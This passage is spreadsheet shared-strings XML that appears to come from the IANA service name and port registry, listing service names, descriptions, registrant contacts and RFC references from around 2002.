IANA assigned this well-formed service name as a replacement for "printer_agent".</t>
  </si>
  <si>
    <t>[Devon_Taylor]</t>
  </si>
  <si>
    <t>printer_agent</t>
  </si>
  <si>
    <t>Printer Agent</t>
  </si>
  <si>
    <t>This entry is an alias to "printer-agent".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>cloanto-lm</t>
  </si>
  <si>
    <t>Cloanto License Manager</t>
  </si>
  <si>
    <t>[Takeo_Sato]</t>
  </si>
  <si>
    <t>mercantile</t>
  </si>
  <si>
    <t>Mercantile</t>
  </si>
  <si>
    <t>[Erik_Kragh_Jensen]</t>
  </si>
  <si>
    <t>csms</t>
  </si>
  <si>
    <t>CSMS</t>
  </si>
  <si>
    <t>csms2</t>
  </si>
  <si>
    <t>CSMS2</t>
  </si>
  <si>
    <t>[Markus_Michels_2]</t>
  </si>
  <si>
    <t>filecast</t>
  </si>
  <si>
    <t>[Eden_Sherry]</t>
  </si>
  <si>
    <t>fxaengine-net</t>
  </si>
  <si>
    <t>FXa Engine Network Port</t>
  </si>
  <si>
    <t>[Lucas_Alonso]</t>
  </si>
  <si>
    <t>nokia-ann-ch1</t>
  </si>
  <si>
    <t>Nokia Announcement ch 1</t>
  </si>
  <si>
    <t>nokia-ann-ch2</t>
  </si>
  <si>
    <t>Nokia Announcement ch 2</t>
  </si>
  <si>
    <t>[Morteza_Kalhour]</t>
  </si>
  <si>
    <t>ldap-admin</t>
  </si>
  <si>
    <t>LDAP admin server port</t>
  </si>
  <si>
    <t>[Stephen_Tsun_2]</t>
  </si>
  <si>
    <t>BESApi</t>
  </si>
  <si>
    <t>BES Api Port</t>
  </si>
  <si>
    <t>[Colin_Griffiths]</t>
  </si>
  <si>
    <t>networklens</t>
  </si>
  <si>
    <t>NetworkLens Event Port</t>
  </si>
  <si>
    <t>networklenss</t>
  </si>
  <si>
    <t>NetworkLens SSL Event</t>
  </si>
  <si>
    <t>[Greg_Bailey]</t>
  </si>
  <si>
    <t>biolink-auth</t>
  </si>
  <si>
    <t>BioLink Authenteon server</t>
  </si>
  <si>
    <t>[BioLink_Support]</t>
  </si>
  <si>
    <t>xmlblaster</t>
  </si>
  <si>
    <t>xmlBlaster</t>
  </si>
  <si>
    <t>[Marcel_Ruff]</t>
  </si>
  <si>
    <t>svnet</t>
  </si>
  <si>
    <t>SpecView Networking</t>
  </si>
  <si>
    <t>[Richard_Dickins]</t>
  </si>
  <si>
    <t>wip-port</t>
  </si>
  <si>
    <t>BroadCloud WIP Port</t>
  </si>
  <si>
    <t>bcinameservice</t>
  </si>
  <si>
    <t>BCI Name Service</t>
  </si>
  <si>
    <t>[Dennis_Parker]</t>
  </si>
  <si>
    <t>commandport</t>
  </si>
  <si>
    <t>AirMobile IS Command Port</t>
  </si>
  <si>
    <t>[Mike_Klein]</t>
  </si>
  <si>
    <t>csvr</t>
  </si>
  <si>
    <t>ConServR file translation</t>
  </si>
  <si>
    <t>[Albert_Leung]</t>
  </si>
  <si>
    <t>rnmap</t>
  </si>
  <si>
    <t>Remote nmap</t>
  </si>
  <si>
    <t>[Tuomo_Makinen]</t>
  </si>
  <si>
    <t>softaudit</t>
  </si>
  <si>
    <t>Isogon SoftAudit</t>
  </si>
  <si>
    <t>[Per_Hellberg]</t>
  </si>
  <si>
    <t>ISogon SoftAudit</t>
  </si>
  <si>
    <t>ifcp-port</t>
  </si>
  <si>
    <t>iFCP User Port</t>
  </si>
  <si>
    <t>[RFC4172]</t>
  </si>
  <si>
    <t>bmap</t>
  </si>
  <si>
    <t>Bull Apprise portmapper</t>
  </si>
  <si>
    <t>[Jeremy_Gilbert]</t>
  </si>
  <si>
    <t>rusb-sys-port</t>
  </si>
  <si>
    <t>Remote USB System Port</t>
  </si>
  <si>
    <t>[Steven_Klein]</t>
  </si>
  <si>
    <t>xtrm</t>
  </si>
  <si>
    <t>xTrade Reliable Messaging</t>
  </si>
  <si>
    <t>xtrms</t>
  </si>
  <si>
    <t>xTrade over TLS/SSL</t>
  </si>
  <si>
    <t>[Mats_Nilsson]</t>
  </si>
  <si>
    <t>agps-port</t>
  </si>
  <si>
    <t>AGPS Access Port</t>
  </si>
  <si>
    <t>[Kristoffer_Nilsson]</t>
  </si>
  <si>
    <t>arkivio</t>
  </si>
  <si>
    <t>Arkivio Storage Protocol</t>
  </si>
  <si>
    <t>[Bruce_Greenblatt]</t>
  </si>
  <si>
    <t>websphere-snmp</t>
  </si>
  <si>
    <t>WebSphere SNMP</t>
  </si>
  <si>
    <t>[Richard_Mills]</t>
  </si>
  <si>
    <t>twcss</t>
  </si>
  <si>
    <t>2Wire CSS</t>
  </si>
  <si>
    <t>[Wire_IANA_Contact]</t>
  </si>
  <si>
    <t>gcsp</t>
  </si>
  <si>
    <t>GCSP user port</t>
  </si>
  <si>
    <t>[Anirban_Majumder]</t>
  </si>
  <si>
    <t>ssdispatch</t>
  </si>
  <si>
    <t>Scott Studios Dispatch</t>
  </si>
  <si>
    <t>[Michael_Settles]</t>
  </si>
  <si>
    <t>ndl-als</t>
  </si>
  <si>
    <t>Active License Server Port</t>
  </si>
  <si>
    <t>[Quentin_Brown]</t>
  </si>
  <si>
    <t>osdcp</t>
  </si>
  <si>
    <t>Secure Device Protocol</t>
  </si>
  <si>
    <t>[Peter_Fernandez]</t>
  </si>
  <si>
    <t>opnet-smp</t>
  </si>
  <si>
    <t>OPNET Service Management Platform</t>
  </si>
  <si>
    <t>opencm</t>
  </si>
  <si>
    <t>OpenCM Server</t>
  </si>
  <si>
    <t>[Jonathan_S_Shapiro]</t>
  </si>
  <si>
    <t>pacom</t>
  </si>
  <si>
    <t>Pacom Security User Port</t>
  </si>
  <si>
    <t>[Steve_Barton]</t>
  </si>
  <si>
    <t>gc-config</t>
  </si>
  <si>
    <t>GuardControl Exchange Protocol</t>
  </si>
  <si>
    <t>[Andreas_Schwarz]</t>
  </si>
  <si>
    <t>autocueds</t>
  </si>
  <si>
    <t>Autocue Directory Service</t>
  </si>
  <si>
    <t>spiral-admin</t>
  </si>
  <si>
    <t>Spiralcraft Admin</t>
  </si>
  <si>
    <t>[Michael_Toth]</t>
  </si>
  <si>
    <t>hri-port</t>
  </si>
  <si>
    <t>HRI Interface Port</t>
  </si>
  <si>
    <t>[John_Fayos]</t>
  </si>
  <si>
    <t>ans-console</t>
  </si>
  <si>
    <t>Net Steward Mgmt Console</t>
  </si>
  <si>
    <t>[John_Richmond]</t>
  </si>
  <si>
    <t>connect-client</t>
  </si>
  <si>
    <t>OC Connect Client</t>
  </si>
  <si>
    <t>connect-server</t>
  </si>
  <si>
    <t>OC Connect Server</t>
  </si>
  <si>
    <t>[Mike_Velten_2]</t>
  </si>
  <si>
    <t>ov-nnm-websrv</t>
  </si>
  <si>
    <t>OpenView Network Node Manager WEB Server</t>
  </si>
  <si>
    <t>denali-server</t>
  </si>
  <si>
    <t>Denali Server</t>
  </si>
  <si>
    <t>[Joe_Devlin]</t>
  </si>
  <si>
    <t>monp</t>
  </si>
  <si>
    <t>Media Object Network Protocol</t>
  </si>
  <si>
    <t>[Aethercloud]</t>
  </si>
  <si>
    <t>[Ron_Herardian]</t>
  </si>
  <si>
    <t>3comfaxrpc</t>
  </si>
  <si>
    <t>3Com FAX RPC port</t>
  </si>
  <si>
    <t>[Christopher_Wells_2]</t>
  </si>
  <si>
    <t>2002-04</t>
  </si>
  <si>
    <t>directnet</t>
  </si>
  <si>
    <t>DirectNet IM System</t>
  </si>
  <si>
    <t>[Gregory_Richards]</t>
  </si>
  <si>
    <t>dnc-port</t>
  </si>
  <si>
    <t>Discovery and Net Config</t>
  </si>
  <si>
    <t>[Chi_Chen]</t>
  </si>
  <si>
    <t>hotu-chat</t>
  </si>
  <si>
    <t>HotU Chat</t>
  </si>
  <si>
    <t>[Tim_Burgess]</t>
  </si>
  <si>
    <t>castorproxy</t>
  </si>
  <si>
    <t>CAStorProxy</t>
  </si>
  <si>
    <t>[Raymond_J_Young]</t>
  </si>
  <si>
    <t>asam</t>
  </si>
  <si>
    <t>ASAM Services</t>
  </si>
  <si>
    <t>[Mike_Gossett]</t>
  </si>
  <si>
    <t>sabp-signal</t>
  </si>
  <si>
    <t>SABP-Signalling Protocol</t>
  </si>
  <si>
    <t>[Brendan_McWilliams]</t>
  </si>
  <si>
    <t>pscupd</t>
  </si>
  <si>
    <t>PSC Update</t>
  </si>
  <si>
    <t>[Datalogic_ADC_Inc]</t>
  </si>
  <si>
    <t>[Reid_B_Ligon]</t>
  </si>
  <si>
    <t>mira</t>
  </si>
  <si>
    <t>Apple Remote Access Protocol</t>
  </si>
  <si>
    <t>[Mike_Alexander]</t>
  </si>
  <si>
    <t>prsvp</t>
  </si>
  <si>
    <t>RSVP Port</t>
  </si>
  <si>
    <t>vat</t>
  </si>
  <si>
    <t>VAT default data</t>
  </si>
  <si>
    <t>[Van_Jacobson]</t>
  </si>
  <si>
    <t>vat-control</t>
  </si>
  <si>
    <t>VAT default control</t>
  </si>
  <si>
    <t>d3winosfi</t>
  </si>
  <si>
    <t>D3WinOSFI</t>
  </si>
  <si>
    <t>[Brad_Hamilton]</t>
  </si>
  <si>
    <t>integral</t>
  </si>
  <si>
    <t>TIP Integral</t>
  </si>
  <si>
    <t>edm-manager</t>
  </si>
  <si>
    <t>EDM Manger</t>
  </si>
  <si>
    <t>edm-stager</t>
  </si>
  <si>
    <t>EDM Stager</t>
  </si>
  <si>
    <t>edm-std-notify</t>
  </si>
  <si>
    <t>EDM STD Notify</t>
  </si>
  <si>
    <t>edm-adm-notify</t>
  </si>
  <si>
    <t>EDM ADM Notify</t>
  </si>
  <si>
    <t>edm-mgr-sync</t>
  </si>
  <si>
    <t>EDM MGR Sync</t>
  </si>
  <si>
    <t>edm-mgr-cntrl</t>
  </si>
  <si>
    <t>EDM MGR Cntrl</t>
  </si>
  <si>
    <t>[Tom_Hennessy]</t>
  </si>
  <si>
    <t>workflow</t>
  </si>
  <si>
    <t>WORKFLOW</t>
  </si>
  <si>
    <t>[Robert_Hufsky]</t>
  </si>
  <si>
    <t>rcst</t>
  </si>
  <si>
    <t>RCST</t>
  </si>
  <si>
    <t>[Kit_Sturgeon]</t>
  </si>
  <si>
    <t>ttcmremotectrl</t>
  </si>
  <si>
    <t>TTCM Remote Controll</t>
  </si>
  <si>
    <t>[Yossi_Cohen_Shahar]</t>
  </si>
  <si>
    <t>pluribus</t>
  </si>
  <si>
    <t>Pluribus</t>
  </si>
  <si>
    <t>[Mark_Miller]</t>
  </si>
  <si>
    <t>jt400</t>
  </si>
  <si>
    <t>jt400-ssl</t>
  </si>
  <si>
    <t>[Clifton_Nock]</t>
  </si>
  <si>
    <t>jaugsremotec-1</t>
  </si>
  <si>
    <t>JAUGS N-G Remotec 1</t>
  </si>
  <si>
    <t>jaugsremotec-2</t>
  </si>
  <si>
    <t>JAUGS N-G Remotec 2</t>
  </si>
  <si>
    <t>[Steven_B_Cliff]</t>
  </si>
  <si>
    <t>ttntspauto</t>
  </si>
  <si>
    <t>TSP Automation</t>
  </si>
  <si>
    <t>[Arnie_Koster]</t>
  </si>
  <si>
    <t>genisar-port</t>
  </si>
  <si>
    <t>Genisar Comm Port</t>
  </si>
  <si>
    <t>[Candace_Niccolson]</t>
  </si>
  <si>
    <t>nppmp</t>
  </si>
  <si>
    <t>NVIDIA Mgmt Protocol</t>
  </si>
  <si>
    <t>[Gilbert_Yeung]</t>
  </si>
  <si>
    <t>ecomm</t>
  </si>
  <si>
    <t>eComm link port</t>
  </si>
  <si>
    <t>[Thomas_Soerensen]</t>
  </si>
  <si>
    <t>stun</t>
  </si>
  <si>
    <t>Session Traversal Utilities for NAT (STUN) port</t>
  </si>
  <si>
    <t>[RFC8489]</t>
  </si>
  <si>
    <t>turn</t>
  </si>
  <si>
    <t>TURN over TCP</t>
  </si>
  <si>
    <t>[RFC8656]</t>
  </si>
  <si>
    <t>TURN over UDP</t>
  </si>
  <si>
    <t>stun-behavior</t>
  </si>
  <si>
    <t>STUN Behavior Discovery over TCP</t>
  </si>
  <si>
    <t>[RFC5780]</t>
  </si>
  <si>
    <t>STUN Behavior Discovery over UDP</t>
  </si>
  <si>
    <t>twrpc</t>
  </si>
  <si>
    <t>2Wire RPC</t>
  </si>
  <si>
    <t>plethora</t>
  </si>
  <si>
    <t>Secure Virtual Workspace</t>
  </si>
  <si>
    <t>[Tim_Simms]</t>
  </si>
  <si>
    <t>cleanerliverc</t>
  </si>
  <si>
    <t>CleanerLive remote ctrl</t>
  </si>
  <si>
    <t>[David_Mojdehi]</t>
  </si>
  <si>
    <t>vulture</t>
  </si>
  <si>
    <t>Vulture Monitoring System</t>
  </si>
  <si>
    <t>[Jason_Santos]</t>
  </si>
  <si>
    <t>slim-devices</t>
  </si>
  <si>
    <t>Slim Devices Protocol</t>
  </si>
  <si>
    <t>[Sean_Adams]</t>
  </si>
  <si>
    <t>2002-05</t>
  </si>
  <si>
    <t>gbs-stp</t>
  </si>
  <si>
    <t>GBS SnapTalk Protocol</t>
  </si>
  <si>
    <t>[Eric_Harris_Braun]</t>
  </si>
  <si>
    <t>celatalk</t>
  </si>
  <si>
    <t>CelaTalk</t>
  </si>
  <si>
    <t>[Carl_Blundell]</t>
  </si>
  <si>
    <t>ifsf-hb-port</t>
  </si>
  <si>
    <t>IFSF Heartbeat Port</t>
  </si>
  <si>
    <t>[IFSF_Secretary]</t>
  </si>
  <si>
    <t>ltctcp</t>
  </si>
  <si>
    <t>LISA TCP Transfer Channel</t>
  </si>
  <si>
    <t>ltcudp</t>
  </si>
  <si>
    <t>LISA UDP Transfer Channel</t>
  </si>
  <si>
    <t>[Pit_Vetterick]</t>
  </si>
  <si>
    <t>fs-rh-srv</t>
  </si>
  <si>
    <t>FS Remote Host Server</t>
  </si>
  <si>
    <t>[Brian_Nickles]</t>
  </si>
  <si>
    <t>dtp-dia</t>
  </si>
  <si>
    <t>DTP/DIA</t>
  </si>
  <si>
    <t>[Alexei_V_Soloviev]</t>
  </si>
  <si>
    <t>colubris</t>
  </si>
  <si>
    <t>Colubris Management Port</t>
  </si>
  <si>
    <t>[Gilbert_Moineau]</t>
  </si>
  <si>
    <t>swr-port</t>
  </si>
  <si>
    <t>SWR Port</t>
  </si>
  <si>
    <t>[Ian_Manning]</t>
  </si>
  <si>
    <t>tvdumtray-port</t>
  </si>
  <si>
    <t>TVDUM Tray Port</t>
  </si>
  <si>
    <t>[Peter_Boers]</t>
  </si>
  <si>
    <t>nut</t>
  </si>
  <si>
    <t>Network UPS Tools</t>
  </si>
  <si>
    <t>[Russell_Kroll]</t>
  </si>
  <si>
    <t>ibm3494</t>
  </si>
  <si>
    <t>IBM 3494</t>
  </si>
  <si>
    <t>[Jeffrey_Pilch]</t>
  </si>
  <si>
    <t>seclayer-tcp</t>
  </si>
  <si>
    <t>securitylayer over tcp</t>
  </si>
  <si>
    <t>seclayer-tls</t>
  </si>
  <si>
    <t>securitylayer over tls</t>
  </si>
  <si>
    <t>[Arno_Hollosi]</t>
  </si>
  <si>
    <t>ipether232port</t>
  </si>
  <si>
    <t>ipEther232Port</t>
  </si>
  <si>
    <t>[Marcus_Leufgen]</t>
  </si>
  <si>
    <t>dashpas-port</t>
  </si>
  <si>
    <t>DASHPAS user port</t>
  </si>
  <si>
    <t>[Albrecht_Mayer]</t>
  </si>
  <si>
    <t>sccip-media</t>
  </si>
  <si>
    <t>SccIP Media</t>
  </si>
  <si>
    <t>[David_Yon_2]</t>
  </si>
  <si>
    <t>rtmp-port</t>
  </si>
  <si>
    <t>RTMP Port</t>
  </si>
  <si>
    <t>[Miriam_Wohlgelernter]</t>
  </si>
  <si>
    <t>isoft-p2p</t>
  </si>
  <si>
    <t>iSoft-P2P</t>
  </si>
  <si>
    <t>[David_Walling_2]</t>
  </si>
  <si>
    <t>avinstalldisc</t>
  </si>
  <si>
    <t>Avocent Install Discovery</t>
  </si>
  <si>
    <t>[Brian_S_Stewart_2]</t>
  </si>
  <si>
    <t>lsp-ping</t>
  </si>
  <si>
    <t>MPLS LSP-echo Port</t>
  </si>
  <si>
    <t>[RFC8029]</t>
  </si>
  <si>
    <t>ironstorm</t>
  </si>
  <si>
    <t>IronStorm game server</t>
  </si>
  <si>
    <t>[Arnaud_Clermonte]</t>
  </si>
  <si>
    <t>ccmcomm</t>
  </si>
  <si>
    <t>CCM communications port</t>
  </si>
  <si>
    <t>[Tom_Bougan]</t>
  </si>
  <si>
    <t>apc-3506</t>
  </si>
  <si>
    <t>APC 3506</t>
  </si>
  <si>
    <t>nesh-broker</t>
  </si>
  <si>
    <t>Nesh Broker Port</t>
  </si>
  <si>
    <t>[Jeremy_Maiden]</t>
  </si>
  <si>
    <t>interactionweb</t>
  </si>
  <si>
    <t>Interaction Web</t>
  </si>
  <si>
    <t>[Mike_Gagle_2]</t>
  </si>
  <si>
    <t>vt-ssl</t>
  </si>
  <si>
    <t>Virtual Token SSL Port</t>
  </si>
  <si>
    <t>[Libor_Sykora]</t>
  </si>
  <si>
    <t>xss-port</t>
  </si>
  <si>
    <t>XSS Port</t>
  </si>
  <si>
    <t>[Joe_Purcell]</t>
  </si>
  <si>
    <t>webmail-2</t>
  </si>
  <si>
    <t>WebMail/2</t>
  </si>
  <si>
    <t>[Dimitris_Michelinaki]</t>
  </si>
  <si>
    <t>aztec</t>
  </si>
  <si>
    <t>Aztec Distribution Port</t>
  </si>
  <si>
    <t>[Alan_Francis]</t>
  </si>
  <si>
    <t>arcpd</t>
  </si>
  <si>
    <t>Adaptec Remote Protocol</t>
  </si>
  <si>
    <t>[Hardy_Doelfel]</t>
  </si>
  <si>
    <t>must-p2p</t>
  </si>
  <si>
    <t>MUST Peer to Peer</t>
  </si>
  <si>
    <t>must-backplane</t>
  </si>
  <si>
    <t>MUST Backplane</t>
  </si>
  <si>
    <t>[Rick_Stefanik]</t>
  </si>
  <si>
    <t>smartcard-port</t>
  </si>
  <si>
    <t>Smartcard Port</t>
  </si>
  <si>
    <t>[Scott_Guthery]</t>
  </si>
  <si>
    <t>802-11-iapp</t>
  </si>
  <si>
    <t>IEEE 802.11 WLANs WG IAPP</t>
  </si>
  <si>
    <t>[Stuart_J_Kerry]</t>
  </si>
  <si>
    <t>artifact-msg</t>
  </si>
  <si>
    <t>Artifact Message Server</t>
  </si>
  <si>
    <t>[Ron_Capwell]</t>
  </si>
  <si>
    <t>2002-06</t>
  </si>
  <si>
    <t>nvmsgd</t>
  </si>
  <si>
    <t>Netvion Messenger Port</t>
  </si>
  <si>
    <t>galileo</t>
  </si>
  <si>
    <t>Netvion Galileo Port</t>
  </si>
  <si>
    <t>galileolog</t>
  </si>
  <si>
    <t>Netvion Galileo Log Port</t>
  </si>
  <si>
    <t>[Ray_Caruso]</t>
  </si>
  <si>
    <t>mc3ss</t>
  </si>
  <si>
    <t>Telequip Labs MC3SS</t>
  </si>
  <si>
    <t>[Michael_Sparks]</t>
  </si>
  <si>
    <t>nssocketport</t>
  </si>
  <si>
    <t>DO over NSSocketPort</t>
  </si>
  <si>
    <t>[Douglas_Davidson]</t>
  </si>
  <si>
    <t>odeumservlink</t>
  </si>
  <si>
    <t>Odeum Serverlink</t>
  </si>
  <si>
    <t>[Mads_Peter_Back]</t>
  </si>
  <si>
    <t>ecmport</t>
  </si>
  <si>
    <t>ECM Server port</t>
  </si>
  <si>
    <t>eisport</t>
  </si>
  <si>
    <t>EIS Server port</t>
  </si>
  <si>
    <t>[Paul_Kraus]</t>
  </si>
  <si>
    <t>starquiz-port</t>
  </si>
  <si>
    <t>starQuiz Port</t>
  </si>
  <si>
    <t>[Adam_Ernst_2]</t>
  </si>
  <si>
    <t>beserver-msg-q</t>
  </si>
  <si>
    <t>VERITAS Backup Exec Server</t>
  </si>
  <si>
    <t>[Katherine_Wattwood]</t>
  </si>
  <si>
    <t>jboss-iiop</t>
  </si>
  <si>
    <t>JBoss IIOP</t>
  </si>
  <si>
    <t>jboss-iiop-ssl</t>
  </si>
  <si>
    <t>JBoss IIOP/SSL</t>
  </si>
  <si>
    <t>[Francisco_Reverbel]</t>
  </si>
  <si>
    <t>gf</t>
  </si>
  <si>
    <t>Grid Friendly</t>
  </si>
  <si>
    <t>[Daivd_P_Chassin]</t>
  </si>
  <si>
    <t>joltid</t>
  </si>
  <si>
    <t>Joltid</t>
  </si>
  <si>
    <t>raven-rmp</t>
  </si>
  <si>
    <t>Raven Remote Management Control</t>
  </si>
  <si>
    <t>raven-rdp</t>
  </si>
  <si>
    <t>Raven Remote Management Data</t>
  </si>
  <si>
    <t>[Daniel_Sorlov_2]</t>
  </si>
  <si>
    <t>urld-port</t>
  </si>
  <si>
    <t>URL Daemon Port</t>
  </si>
  <si>
    <t>[Jim_Binkley]</t>
  </si>
  <si>
    <t>ms-la</t>
  </si>
  <si>
    <t>MS-LA</t>
  </si>
  <si>
    <t>[Eric_Ledoux]</t>
  </si>
  <si>
    <t>snac</t>
  </si>
  <si>
    <t>SNAC</t>
  </si>
  <si>
    <t>[Tatsuya_Igarashi]</t>
  </si>
  <si>
    <t>2002-07</t>
  </si>
  <si>
    <t>ni-visa-remote</t>
  </si>
  <si>
    <t>Remote NI-VISA port</t>
  </si>
  <si>
    <t>[Sinnadurai_Dharshan]</t>
  </si>
  <si>
    <t>ibm-diradm</t>
  </si>
  <si>
    <t>IBM Directory Server</t>
  </si>
  <si>
    <t>ibm-diradm-ssl</t>
  </si>
  <si>
    <t>IBM Directory Server SSL</t>
  </si>
  <si>
    <t>[Mark_Cavage]</t>
  </si>
  <si>
    <t>pnrp-port</t>
  </si>
  <si>
    <t>PNRP User Port</t>
  </si>
  <si>
    <t>[Igor_Kostic]</t>
  </si>
  <si>
    <t>voispeed-port</t>
  </si>
  <si>
    <t>VoiSpeed Port</t>
  </si>
  <si>
    <t>[Virgilio_Lattanzi]</t>
  </si>
  <si>
    <t>hacl-monitor</t>
  </si>
  <si>
    <t>HA cluster monitor</t>
  </si>
  <si>
    <t>[Jason_Ko]</t>
  </si>
  <si>
    <t>qftest-lookup</t>
  </si>
  <si>
    <t>qftest Lookup Port</t>
  </si>
  <si>
    <t>[Gregor_Schmid]</t>
  </si>
  <si>
    <t>teredo</t>
  </si>
  <si>
    <t>Teredo Port</t>
  </si>
  <si>
    <t>[RFC4380]</t>
  </si>
  <si>
    <t>camac</t>
  </si>
  <si>
    <t>CAMAC equipment</t>
  </si>
  <si>
    <t>[Eugene_Zhiganov]</t>
  </si>
  <si>
    <t>symantec-sim</t>
  </si>
  <si>
    <t>Symantec SIM</t>
  </si>
  <si>
    <t>interworld</t>
  </si>
  <si>
    <t>Interworld</t>
  </si>
  <si>
    <t>[John_Stephen]</t>
  </si>
  <si>
    <t>tellumat-nms</t>
  </si>
  <si>
    <t>Tellumat MDR NMS</t>
  </si>
  <si>
    <t>[Hennie_van_der_Merwe]</t>
  </si>
  <si>
    <t>ssmpp</t>
  </si>
  <si>
    <t>Secure SMPP</t>
  </si>
  <si>
    <t>[Cormac_Long]</t>
  </si>
  <si>
    <t>apcupsd</t>
  </si>
  <si>
    <t>Apcupsd Information Port</t>
  </si>
  <si>
    <t>[Riccardo_Facchetti]</t>
  </si>
  <si>
    <t>taserver</t>
  </si>
  <si>
    <t>TeamAgenda Server Port</t>
  </si>
  <si>
    <t>[Dany_Ayotte]</t>
  </si>
  <si>
    <t>rbr-discovery</t>
  </si>
  <si>
    <t>Red Box Recorder ADP</t>
  </si>
  <si>
    <t>[Simon_Jolly]</t>
  </si>
  <si>
    <t>questnotify</t>
  </si>
  <si>
    <t>Quest Notification Server</t>
  </si>
  <si>
    <t>[Rob_Griffin]</t>
  </si>
  <si>
    <t>razor</t>
  </si>
  <si>
    <t>Vipul's Razor</t>
  </si>
  <si>
    <t>[Vipul_Ved_Prakash]</t>
  </si>
  <si>
    <t>sky-transport</t>
  </si>
  <si>
    <t>Sky Transport Protocol</t>
  </si>
  <si>
    <t>[Michael_Paddon]</t>
  </si>
  <si>
    <t>personalos-001</t>
  </si>
  <si>
    <t>PersonalOS Comm Port</t>
  </si>
  <si>
    <t>[Shane_Roberts]</t>
  </si>
  <si>
    <t>mcp-port</t>
  </si>
  <si>
    <t>MCP user port</t>
  </si>
  <si>
    <t>[Professor_Paul_S_Wa]</t>
  </si>
  <si>
    <t>cctv-port</t>
  </si>
  <si>
    <t>CCTV control port</t>
  </si>
  <si>
    <t>[John_Skidmore]</t>
  </si>
  <si>
    <t>iniserve-port</t>
  </si>
  <si>
    <t>INIServe port</t>
  </si>
  <si>
    <t>[Peter_Moylan]</t>
  </si>
  <si>
    <t>bmc-onekey</t>
  </si>
  <si>
    <t>BMC-OneKey</t>
  </si>
  <si>
    <t>sdbproxy</t>
  </si>
  <si>
    <t>SDBProxy</t>
  </si>
  <si>
    <t>watcomdebug</t>
  </si>
  <si>
    <t>Watcom Debug</t>
  </si>
  <si>
    <t>esimport</t>
  </si>
  <si>
    <t>Electromed SIM port</t>
  </si>
  <si>
    <t>[Francois_Marchand]</t>
  </si>
  <si>
    <t>m2pa</t>
  </si>
  <si>
    <t>M2PA</t>
  </si>
  <si>
    <t>[RFC4165]</t>
  </si>
  <si>
    <t>quest-data-hub</t>
  </si>
  <si>
    <t>Quest Data Hub</t>
  </si>
  <si>
    <t>[Greg_Cottman_2]</t>
  </si>
  <si>
    <t>dof-eps</t>
  </si>
  <si>
    <t>DOF Protocol Stack</t>
  </si>
  <si>
    <t>[OpenDOF]</t>
  </si>
  <si>
    <t>[Bryant_Eastham]</t>
  </si>
  <si>
    <t>dof-tunnel-sec</t>
  </si>
  <si>
    <t>DOF Secure Tunnel</t>
  </si>
  <si>
    <t>mbg-ctrl</t>
  </si>
  <si>
    <t>Meinberg Control Service</t>
  </si>
  <si>
    <t>[Meinberg_Funkuhren_GmbH_Co_KG]</t>
  </si>
  <si>
    <t>[Meinberg_IANA_Registrations]</t>
  </si>
  <si>
    <t>mccwebsvr-port</t>
  </si>
  <si>
    <t>MCC Web Server Port</t>
  </si>
  <si>
    <t>megardsvr-port</t>
  </si>
  <si>
    <t>MegaRAID Server Port</t>
  </si>
  <si>
    <t>megaregsvrport</t>
  </si>
  <si>
    <t>Registration Server Port</t>
  </si>
  <si>
    <t>[Sreenivas_Bagalkote]</t>
  </si>
  <si>
    <t>tag-ups-1</t>
  </si>
  <si>
    <t>Advantage Group UPS Suite</t>
  </si>
  <si>
    <t>[James_Goddard]</t>
  </si>
  <si>
    <t>dmaf-server</t>
  </si>
  <si>
    <t>DMAF Server</t>
  </si>
  <si>
    <t>dmaf-caster</t>
  </si>
  <si>
    <t>DMAF Caster</t>
  </si>
  <si>
    <t>[Ramakrishna_Nadendla]</t>
  </si>
  <si>
    <t>ccm-port</t>
  </si>
  <si>
    <t>Coalsere CCM Port</t>
  </si>
  <si>
    <t>cmc-port</t>
  </si>
  <si>
    <t>Coalsere CMC Port</t>
  </si>
  <si>
    <t>[Chris_Hawkinson]</t>
  </si>
  <si>
    <t>config-port</t>
  </si>
  <si>
    <t>Configuration Port</t>
  </si>
  <si>
    <t>data-port</t>
  </si>
  <si>
    <t>Data Port</t>
  </si>
  <si>
    <t>[Anupam_Bharali]</t>
  </si>
  <si>
    <t>ttat3lb</t>
  </si>
  <si>
    <t>Tarantella Load Balancing</t>
  </si>
  <si>
    <t>[Jim_Musgrave]</t>
  </si>
  <si>
    <t>nati-svrloc</t>
  </si>
  <si>
    <t>NATI-ServiceLocator</t>
  </si>
  <si>
    <t>[Jason_Case]</t>
  </si>
  <si>
    <t>kfxaclicensing</t>
  </si>
  <si>
    <t>Ascent Capture Licensing</t>
  </si>
  <si>
    <t>[Brad_Hamilton_2]</t>
  </si>
  <si>
    <t>press</t>
  </si>
  <si>
    <t>PEG PRESS Server</t>
  </si>
  <si>
    <t>[Jim_DeLisle]</t>
  </si>
  <si>
    <t>canex-watch</t>
  </si>
  <si>
    <t>CANEX Watch System</t>
  </si>
  <si>
    <t>[Peter_Kollath]</t>
  </si>
  <si>
    <t>u-dbap</t>
  </si>
  <si>
    <t>U-DBase Access Protocol</t>
  </si>
  <si>
    <t>emprise-lls</t>
  </si>
  <si>
    <t>Emprise License Server</t>
  </si>
  <si>
    <t>emprise-lsc</t>
  </si>
  <si>
    <t>License Server Console</t>
  </si>
  <si>
    <t>[James_J_Diaz]</t>
  </si>
  <si>
    <t>p2pgroup</t>
  </si>
  <si>
    <t>Peer to Peer Grouping</t>
  </si>
  <si>
    <t>sentinel</t>
  </si>
  <si>
    <t>Sentinel Server</t>
  </si>
  <si>
    <t>[Ian_Gordon]</t>
  </si>
  <si>
    <t>isomair</t>
  </si>
  <si>
    <t>[Richard_Fleming]</t>
  </si>
  <si>
    <t>wv-csp-sms</t>
  </si>
  <si>
    <t>WV CSP SMS Binding</t>
  </si>
  <si>
    <t>[Matti_Salmi]</t>
  </si>
  <si>
    <t>gtrack-server</t>
  </si>
  <si>
    <t>LOCANIS G-TRACK Server</t>
  </si>
  <si>
    <t>gtrack-ne</t>
  </si>
  <si>
    <t>LOCANIS G-TRACK NE Port</t>
  </si>
  <si>
    <t>[Juergen_Edelhaeuser]</t>
  </si>
  <si>
    <t>bpmd</t>
  </si>
  <si>
    <t>BP Model Debugger</t>
  </si>
  <si>
    <t>[Keith_Fligg]</t>
  </si>
  <si>
    <t>mediaspace</t>
  </si>
  <si>
    <t>MediaSpace</t>
  </si>
  <si>
    <t>shareapp</t>
  </si>
  <si>
    <t>ShareApp</t>
  </si>
  <si>
    <t>[Jeff_King]</t>
  </si>
  <si>
    <t>iw-mmogame</t>
  </si>
  <si>
    <t>Illusion Wireless MMOG</t>
  </si>
  <si>
    <t>[Jan_Vrsinsky]</t>
  </si>
  <si>
    <t>a14</t>
  </si>
  <si>
